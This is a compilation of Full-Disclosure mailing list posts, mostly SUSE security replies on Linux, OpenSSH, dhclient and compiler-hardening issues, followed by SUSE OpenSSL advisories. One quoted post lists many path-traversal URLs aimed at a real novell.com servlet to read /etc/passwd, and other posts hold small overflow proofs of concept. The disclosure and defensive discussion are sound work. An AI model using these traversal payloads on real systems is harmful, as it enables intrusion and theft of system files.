[Full-disclosure] Pre-Auth remote crash in NanoSSH on Avaya Ethernet Routing switch (ERS) 5698 and 5698-PoE
Hi, Various openssh 6.2p1 users including our administrators stumbled over this nice bug in the nanossh server during pre authentication phase within nanossh ( https://www.mocana.com/for-device-manufacturers/nanossh/ ) Bug at openssh bugzilla: https://bugzilla.mindrot.org/show_bug.cgi?id=2116 http://www.gossamer-threads.com/lists/openssh/bugs/55880 Basically if the HMAC list is unexpected long (1) the remote nanossh daemon will crash. Unclear if code execution, but well, I would not bet against it. Also unclear if more than the listed Nortel switches are affected, or all nanossh deployers, but probably yes. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how i stopped worrying and loved the backdoor
On Sat, Aug 18, 2012 at 04:00:20PM -0700, coderman wrote: Dan just released DakaRand http://dankaminsky.com/2012/08/15/dakarand/ src http://s3.amazonaws.com/dmk/dakarand-1.0.tgz while admitting that Matt Blaze has essentially disowned this approach, and seems to be honestly horrified that I’m revisiting it and Let me be the first to say, I don’t know that this works. this mode would greatly reduce, maybe eliminate the incidence of key duplication in large sample sets (e.g. visibly poor entropy for key generation) the weak keys[0] authors clearly posit that they have detected merely the most obvious and readily accessible poor keys, and that further attacks against generator state could yield even more vulnerable pairs... you have been warned :P the solution is adding hw entropy[1][2] to the mix. anything less is doing it wrong! if you don't have hw entropy, adding dakarand is better than not. Lots of people are using haveged already, it operates on a similar principle. http://www.issihosts.com/haveged/ Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The story of the Linux kernel 3.x...
On Wed, May 16, 2012 at 07:54:13PM +0200, Nicolas Surribas wrote: I can't reproduce with current openSUSE 12.1... sh-4.2$ uname -rop 3.1.10-1.9-desktop x86_64 GNU/Linux sh-4.2$ lsb-release -ri Distributor ID: SUSE LINUX Release:12.1 sh-4.2$ cat /proc/self/maps | grep vdso 7fff48b58000-7fff48b59000 r-xp 00:00 0 [vdso] sh-4.2$ cat /proc/self/maps | grep vdso 7fffabbff000-7fffabc0 r-xp 00:00 0 [vdso] sh-4.2$ cat /proc/sys/kernel/randomize_va_space 1 x86_64 is a bit different. openSUSE 12.1 x86 (32bit) still uses COMPAT_VDSO, as it was never really clear what kind of applications would break if disabled. The next openSUSE, openSUSE 12.2, will have the 32bit VDSO randomized. Also, randomize_va_space will be 2 (heap randomization too for PIE binaries). Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The story of the Linux kernel 3.x...
On Wed, May 16, 2012 at 10:23:19PM +0200, Tavis Ormandy wrote: Tavis Ormandy tav...@cmpxchg8b.com wrote: Adam Zabrocki p...@pi3.com.pl wrote: Hi Tavis, Don't know why you don't believe me :) Anyway: I don't believe any distribution stock kernel enabled it, because this is just too simple to get wrong. But if they have, we need to find out who enabled it so you can file bugs in the appropriate place. Looks like I'm wrong, SuSE do enable it on x86. How disappointing, looks like my faith in them was misplaced. You should definitely complain if you're a Novell customer, that is just ridiculous. As written in the other e-mail, it is basically fighting against people who think that disabling it will break things. Nobody can actually point to an application that breaks. That said, openSUSE 12.2 will have it disabled. Disabling it for older products ... see above. :/ Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools
Hi,
How is this different from writing a fork bomb?
Ciao, Marcus
On Tue, Mar 13, 2012 at 09:42:29AM +0100, Christophe Alladoum wrote:
[ Description ]
An integer overflow was found in iputils/ping_common.c main_loop() function
which could lead to excessive CPU usage when triggered (could lead to DoS).
This
means that both ping and ping6 are vulnerable.
[ Proof-Of-Concept ]
Specify big interval (-i option) for ping/ping6 tool:
{{{
$ ping -i 3600 google.com
PING google.com (173.194.66.102) 56(84) bytes of data.
64 bytes from we-in-f102.1e100.net (173.194.66.102): icmp_req=1 ttl=50
time=11.4 ms
[...]
}}}
And check your CPU usage (top, htop, etc.)
[ Explanation ]
Here, ping will loop in main_loop() loop in this section of code :
{{{
/* from iputils-s20101006 source */
/* ping_common.c */
546 void main_loop(int icmp_sock, __u8 *packet, int packlen)
547 {
[...]
559 for (;;) {
[...]
572 do {
573 next = pinger();
574 next = schedule_exit(next);
575 } while (next = 0);
[...]
588 if ((options (F_ADAPTIVE|F_FLOOD_POLL)) ||
nextSCHINT(interval)) {
[...]
593 if (1000*next = 100/(int)HZ) {
}}}
If interval parameter (-i) is set, then condition L593 will overflow (ie.
value
exceeding sizeof(signed integer)), making this statement always true for big
values (e.g. -i 3600). As a consequence, ping process will start looping
actively as long as condition is true (could be pretty long).
As far as looked, this bug is unlikely to be exploitable besides provoking
Denial-Of-Service.
[ Affected versions ]
Tested on Fedora/Debian/Gentoo Linux system (2.6.x x86_32 and x86_64) on
iputils
version 20101006. ping6 seems also to be affected since it's relying on same
ping_common.c functions.
Since iputils is not maintained any longer
(http://www.spinics.net/lists/netdev/msg191346.html), patch must be applied
from
source.
[ Patch ]
Quick'n dirty patch (full patch in appendix) is to cast test result as long
long:
{{{
593 if (((long long)1000*next) = (long
long)100/(int)HZ) {
}}}
[ Credits ]
* Christophe Alladoum (HSC)
* Romain Coltel (HSC)
--
Christophe Alladoum - christophe.allad...@hsc.fr
Hervé Schauer Consultants - http://www.hsc.fr
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Working, but not speaking, for the following german company:
SUSE LINUX Products GmbH, HRB 16746 (AG Nuernberg)
Geschaeftsfuehrer: Jeff Hawn, Jennifer Guild, Felix Imendoerffer
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Trustwave and Mozilla (Resolved)
On Thu, Feb 23, 2012 at 07:11:53AM -0500, David C Frier wrote: On Wed, Feb 22, 2012 at 19:12, Jeffrey Walton noloa...@gmail.com wrote: It appears to be official. Trustwave issued MitM certificates, which is deceptive, unethical, and contrary to its agreement for inclusion. Mozilla just rewarded their violations of trust by continuing their inclusion. Apparently, agreements between Mozilla and CAs have no veracity as both are more than happy to violate the end user. This is not the simplistic issue with clear moral blacks and whites that you seem to think it is. Companies need MitM certs to fully implement DLP and protect proprietary data - HR info, trade secrets, unpublished financials. Without them, SSL-protected external sites are potentially back-channels for the leakage of anything someone decides to leak. Workers don't understand what the lines are between work-related and personal network usage. Companies would be suicidal to just give up on this. So, what would you propose as an alternative? That they install their machines with their own CA added to the CA store and use this internal CA for MitM cert signing. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Novell website.
Hi, We have escalated this within Novell and the CRS servlet got removed last week on the day of the report. Ciao, Marcus On Mon, Feb 13, 2012 at 04:36:44PM +0100, Team wrote: Hello :-) I sent email stating the problem for the company, waited a few days and got no response, so I'm making the vulnerability public: Scan date: 2-2-2012 13:33:54 === | Domain: http://www.novell.com/ [1] | Server: Apache | IP: 130.57.5.25 === ... | LFI: | [+] Vul[1] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00 [2] | [+] Vul[2] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.jpg [3] | [+] Vul[3] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.html [4] | [+] Vul[4] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.css [5] | [+] Vul[5] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.php [6] | [+] Vul[6] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.inc [7] | [+] Vul[7] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.txt [8] | [+] Vul[8] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.png [9] | [+] Vul[9] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=//../../../../../../../../etc/passwd%00 [10] | [+] Vul[10] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=//../../../../../../../../etc/passwd%00en [11] | [+] Vul[11] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00 [12] | [+] Vul[12] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00full_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [13] | [+] Vul[13] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.jpgfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [14] | [+] Vul[14] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.cssfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [15] | [+] Vul[15] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.htmlfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [16] | [+] Vul[16] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.txtfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [17] | [+] Vul[17] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.phpfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [18] | [+] Vul[18] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.incfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [19] | [+] Vul[19] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.pngfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [20] | [+] Vul[20] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=//../../../../../../../../etc/passwd%00full_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [21] | [+] Vul[21] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=//../../../../../../../../etc/passwd%00enfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [22] | [+] Vul[22] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00full_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [23] | [+] Vul[23] [LFI]
Re: [Full-disclosure] Requesting/Reserving CVE Question
On Thu, Apr 28, 2011 at 06:42:13PM +0300, Henri Salo wrote: On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com wrote: Hello all, First off, if this isn't the place to ask this question, I apologize, and feel free to ignore this e-mail. I've found a couple vulnerabilities in a web forum/portal/etc. product called IP.Board. I was looking to reserve a CVE number, and I attempted to contact the address Mitre lists for reserving one, however, it's been nearly a month and I have not received anything back from them. This is the first vulnerability I have found, and have never requested/reserved a CVE before, so I am a little unfamiliar with the process (although based off of the following website, it looks like all I need to do is send an e-mail to them - http://cve.mitre.org/cve/obtain_id.html). I've sent follow up e-mails and I've received no response. What my question to you all is how long does this process take? Is there something else that should be done, or someone else the request should be sent to? What's time normal time frame from requesting a CVE number to hearing back from them? Thanks for any help/info/advice. I appreciate it. Chris No luck. With open-source you could have tried: http://oss-security.openwall.org/wiki/mailing-lists/oss-security The oss-security list only handles opensource software, which IP.Board does not appear to be. As for Mitre, just resend the e-mail, they usually answer at some point in time. (They seem to be overworked, so its not just you.) A simple e-mail requesting one as explained in obtain_id.html should work. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ISC DHCP Client [3.0.x to 4.2.x] Arbitrary Command Execution (CVE-2011-0997)
On Wed, Apr 06, 2011 at 02:01:58PM -0400, Ryan Sears wrote: Hey guys, It was recently discovered (NOT by myself) that the ISC dhclient was vulnerable to certain shell metacharacters in the hostname parameter specified by *any* DHCP server, causing it to potentially run arbitrary commands as root. I haven't seen anything else on it here, so I figured I'd make everyone aware. There's only one real phrase that comes to mind = WTF? https://www.isc.org/software/dhcp/advisories/cve-2011-0997 http://www.h-online.com/security/news/item/DHCP-client-allows-shell-command-injection-1222805.html By itself it is not a DHCP client issue, just the fact the DHCP clients let DHCP daemon controlled hostnames through without filtering could in turn make other programs, like e.g. X.Org, execute code when evaluating the hostname unquoted. X.Org was also fixed yesterday: http://lwn.net/Articles/437018/ (It passed -Dsomething=$hostname unquoted to a xrdb call via system()) (discovered by Sebastian Krahmer of SUSE Security.) Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel exploit
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote: Anyone tested this in sandbox yet? 00:37 linups:../expl/kernel cat /etc/*release* openSUSE 11.3 (i586) VERSION = 11.3 00:37 linups:../expl/kernel uname -r 2.6.34.4-0.1-desktop 00:37 linups:../expl/kernel gcc _2.6.37.local.c -o test 00:37 linups:../expl/kernel ./test [*] Failed to open file descriptors. openSUSE 11.2 and 11.3 do not have ECONET compiled, openSUSE 11.1 has ECONET, but not the 0 ptr deref issue. The CVE-2010-4258 problem is however in all openSUSEs. Temporary workaround (for all distributions, not just openSUSE): echo 1 /proc/sys/kernel/panic_on_oops This will now panic the machine instead of making it exploitable. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux Kernel CIFS Vulnerability
On Thu, Apr 09, 2009 at 03:07:40PM +0200, Andreas Bogk wrote:
Dear list,
as discovered by Felix von Leitner (http://blog.fefe.de/?ts=b72905a8),
Linux kernel patch 2.6.29.1 contains:
--- a/fs/cifs/connect.c
+++ b/fs/cifs/connect.c
@@ -3667,7 +3667,7 @@ CIFSTCon(unsigned int xid, struct cifsSesInfo *ses,
BCC(smb_buffer_response)) {
kfree(tcon-nativeFileSystem);
tcon-nativeFileSystem =
- kzalloc(length + 2, GFP_KERNEL);
+ kzalloc(2*(length + 1), GFP_KERNEL);
if (tcon-nativeFileSystem)
cifs_strfromUCS_le(
tcon-nativeFileSystem,
fixing a remotely exploitable buffer overflow vulnerability in the CIFS
protocol.
assuming a malicious server.
Neither the Linux kernel team, the CIFS maintainers nor any of the commercial
Linux distributors bothered to send out an advisory.
I'm at loss for words other than irresponsible, arrogant assholes. Linux
2009 == Microsoft 2002.
The correct wording is no advisory was released yet.
The issue is being worked on already, see the CIFS mailing list etc, thread
starts here:
http://lists.samba.org/archive/linux-cifs-client/2009-April/004322.html
Updates will be published when ready.
Ciao, Marcus
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux Kernel CIFS Vulnerability
On Fri, Apr 10, 2009 at 01:26:43PM +0200, Thierry Zoller wrote: The correct wording is no advisory was released yet. An exception to the rule? The question is why? If fefe wouldn't have pointed it out there would have been no advisory, like the 100 other silently fixed security bugs that even those that backport don't catch. There is a clear statement from the Kernelhacker groups on this situation, and it is *not* positive, so why make it look like those that complain just do it at the wrong point in time. again see : http://lwn.net/Articles/285438/ http://lwn.net/Articles/286263/ http://lwn.net/Articles/287339/ http://lwn.net/Articles/288473/ and hundrets of others. I think we have brought this up to the kernel guys often already without much effect ... and I am aware of above posts. This is Opensource, if the original authors don't provide security guidance, someone else can easily step up and do it, like Brad, or Fefe, or whoever else. Even we as Linux distributors should probably set some people up to study the .stable releases for such things. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting buffer overflows via protected GCC
On Mon, Feb 16, 2009 at 09:00:33AM -0500, ArcSighter Elite wrote: James Matthews wrote: I would recommend doing the following things. 1. Ask on the Ubuntu GCC list what protection is implemented. (Or just look at the source) 2. Use GCC to see where the execution is being redirected and so you can have a better visual of whats going on. 3. Are you sure the stack is executable? _fortify_fail is caused by the light weight buffer overflow checking, enabled by the -D_FORTIFY_SOURCE=2 compile time flag. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting buffer overflows via protected GCC
On Fri, Feb 13, 2009 at 11:50:11AM -0500, Jason Starks wrote:
I came across a problem that I am sure many security researchers have seen
before:
ja...@uboo:~$ cat bof.c
#include stdio.h
#include string.h
int main()
{
char buf[512];
memset(buf, 'A', 528);
return 0;
}
ja...@uboo:~$
ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
ja...@uboo:~$
I have googled my brains out for a solution, but all I have gathered is that
my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to get
this. There seems to be some people on this list who may know something on
how to exploit on *nix systems with this protection enabled.
I do not want to just disable the protection and exploit it normally, I want
Perhaps you should learn first exactly _what_ caught your buffer overflow.
Hint: It was not SSP aka -fstack-protector.
Ciao, Marcus
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] rPSA-2007-0212-1 util-linux
On Fri, Oct 12, 2007 at 05:02:48AM -0700, Andrew Farmer wrote: On 12 Oct 07, at 01:34, yearsilent wrote: could anybody explain this bug? I saw the git diff: - setuid(getuid()); - setgid(getgid()); + if(setgid(getgid()) 0) + die(EX_FAIL, _(umount: cannot set group id: %s), strerror(errno)); + + if(setuid(getuid()) 0) + die(EX_FAIL, _(umount: cannot set user id: %s), strerror(errno)); + not only root can do mount ? what condition could cause setuid failed ? setuid() fails if the operation would create more processes owned by the target user than the number specified by that user's process- count limit. Please also look closer and see the switch of the order of the setuid() and setgid() call to the correct order. CIao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Palimm Palimmm
On Thu, May 31, 2007 at 06:07:30PM +0200, Thierry Zoller wrote: 5DFFC7C3DCFBCED5CEDD48F216936CF9 9B704583D6E5056E67C959B5CCEE2F548D3C70F3 This list is not called SHA1- or MD5-disclosure, it is called full-disclosure. Tell us the real thing or be silent. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ShortNotes : Stack Smashing with GCC4
The classic example (Gera's Law): [File : abo1.c ] After fixing your code (adding a missing #include string.h) $ gcc -o abo1 abo1.c Which is just not how to compile your code. If you pass the right options: $ gcc -O2 -D_FORTIFY_SOURCE=2 xx.c -o xx $ ./xx `perl -e print 'a' x 1024;` *** buffer overflow detected ***: ./xx terminated === Backtrace: = /lib/power4/libc.so.6(__chk_fail+0x68)[0xff7db68] /lib/power4/libc.so.6(__strcpy_chk+0x60)[0xff7c820] ./xx[0x156c] /lib/power4/libc.so.6[0xfea3f70] /lib/power4/libc.so.6[0xfea41cc] ... gcc -O2 -fstack-protector xx.c -o xx ./xx `perl -e print 'a' x 1024;` Input : aa aa *** stack smashing detected ***: ./xx terminated Perhaps you should read the manpages of the compiler first to find the correct options to enable. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability
On Thu, Mar 15, 2007 at 02:16:41PM +0200, Ismail Dönmez wrote:
On Thursday 15 March 2007 04:26:29 James Matthews wrote:
and you would think some bugs we got rid of in open source software!
str{cpy,cat,...} which don't take an size attribute should be removed from
standard libc, I don't see why people still insist on using this insecure
variants.
Thanks to _FORTIFY_SOURCE strcpy and strcat to fixed size buffers are
at least protected now.
I however fail to see two things:
- is minigzip included anywhere?
- If you can exploit it by passing stuff on the commandline, I have
much simpler exploit for you too:
minigzip /dev/null; echo 0wN3d\!
Ciao, Marcus
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] month of PHP bugs, secondary message?
On Sun, Mar 04, 2007 at 05:56:09AM -0600, Gadi Evron wrote: - 3. Are PHP applications also a target of this initiative? No they are not. If you want a month of PHP application bugs you can subscribe to the bugtraq or full-disclosure mailinglists. snip - http://www.php-security.org/ Its the Month of PHP application bugs since over 2 years now. Sad enough. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fire and forget exploits?
On Fri, Oct 20, 2006 at 10:09:13AM -0600, Bruce Ediger wrote: On Fri, 20 Oct 2006, Brendan Dolan-Gavitt wrote: It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. Doesn't this implicitly support Dan Geer et al's argument about software monoculture? In fact, wouldn't the linux monoculture concept constitute a bit of a misnomer? Each slightly different userland and libc would constitute a different flavor, right? Nevertheless, the received wisdom remains that If linux took over from Windows tomorrow, all the hackers would concentrate on linux flaws, and we'd be in the same position. You are also forgetting ASLR as it is getting deployed in most new Linux systems. This reduces the mono culture aspect. (Windows is catching up here too.) Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SUSE Security Announcement: openssl security problems (SUSE-SA:2006:058)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:openssl Announcement ID:SUSE-SA:2006:058 Date: Thu, 28 Sep 2006 18:00:00 + Affected Products: Novell Linux Desktop 9 Novell Linux POS 9 Open Enterprise Server SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SuSE Linux Openexchange Server 4 SUSE LINUX Retail Solution 8 SuSE Linux School Server SuSE Linux Standard Server 8 SUSE SLED 10 SUSE SLES 10 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: remote denial of service Severity (1-10):7 SUSE Default Package: yes Cross-References: CVE-2006-2937, CVE-2006-2940, CVE-2006-3738 CVE-2006-4343, VU#547300, VU#386964 Content of This Advisory: 1) Security Vulnerability Resolved: several security problems in openssl Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Several security problems were found and fixed in the OpenSSL cryptographic library. CVE-2006-3738/VU#547300: A Google security audit found a buffer overflow condition within the SSL_get_shared_ciphers() function which has been fixed. CVE-2006-4343/VU#386964: The above Google security audit also found that the OpenSSL SSLv2 client code fails to properly check for NULL which could lead to a server program using openssl to crash. CVE-2006-2937: Fix mishandling of an error condition in parsing of certain invalid ASN1 structures, which could result in an infinite loop which consumes system memory. CVE-2006-2940: Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack to cause the remote side top spend an excessive amount of time in computation. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/openssl-0.9.8a-18.10.i586.rpm f5d7a08e60a52b7816cae88e9def7762 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/openssl-devel-0.9.8a-18.10.i586.rpm a583491fc985dff2f3f405776fa8554a SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-0.9.7g-2.10.i586.rpm 13d07a7a3b81fdef9ba68b0f0670f14c ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-devel-0.9.7g-2.10.i586.rpm 1198085023a60d99ce90207b5498db45 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-0.9.7e-3.6.i586.rpm 51606d0da43bc5c61562bb8d4679ca8b ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-devel-0.9.7e-3.6.i586.rpm c6a9122fec64b5a82f433c56b602f2b5 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/openssl-0.9.7d-25.6.i586.rpm 96b59a2af5663ae1f780626da0b5756a ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/openssl-devel-0.9.7d-25.6.i586.rpm e33a86104b85919dda444b4a9901a10b Power PC Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/openssl-0.9.8a-18.10.ppc.rpm
[Full-disclosure] SUSE Security Announcement: openssl, mozilla-nss RSA signature evasion (SUSE-SA:2006:055)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:openssl,mozilla-nss Announcement ID:SUSE-SA:2006:055 Date: Fri, 22 Sep 2006 18:00:00 + Affected Products: Novell Linux Desktop 9 Novell Linux POS 9 Open Enterprise Server SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SuSE Linux Openexchange Server 4 SUSE LINUX Retail Solution 8 SuSE Linux School Server SuSE Linux Standard Server 8 SUSE SLED 10 SUSE SLES 10 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: RSA signature evasion Severity (1-10):7 SUSE Default Package: yes Cross-References: CVE-2006-4339, CVE-2006-4340, CVE-2006-4341 Content of This Advisory: 1) Security Vulnerability Resolved: RSA signature evasion Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion If an RSA key with exponent 3 is used it may be possible to forge a PKCS verify the certificate if they are not checking for excess data in the RSA exponentiation result of the signature. This problems affects various SSL implementations. This advisory covers the following implementations: - OpenSSL (CVE-2006-4339) - Mozilla NSS (CVE-2006-4340 and CVE-2006-4341) for SUSE Linux 10.0, 10.1 and SUSE Linux Enterprise 10. Implementations that are affected and still need to be updated: - gnutls in all distributions. - Mozilla NSS before SUSE Linux 10.0 and SUSE Linux Enterprise 10. The official openssl advisory is here: http://www.openssl.org/news/secadv_20060905.txt Some details of the actual technical problem can be found here: http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes Please close and restart running programs using SSL to verify PKCS signatures (web browsers, E-Mail clients, etc.) 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/mozilla-nss-3.11-21.7.i586.rpm 2ca59cfa949741f970019250db6e7890 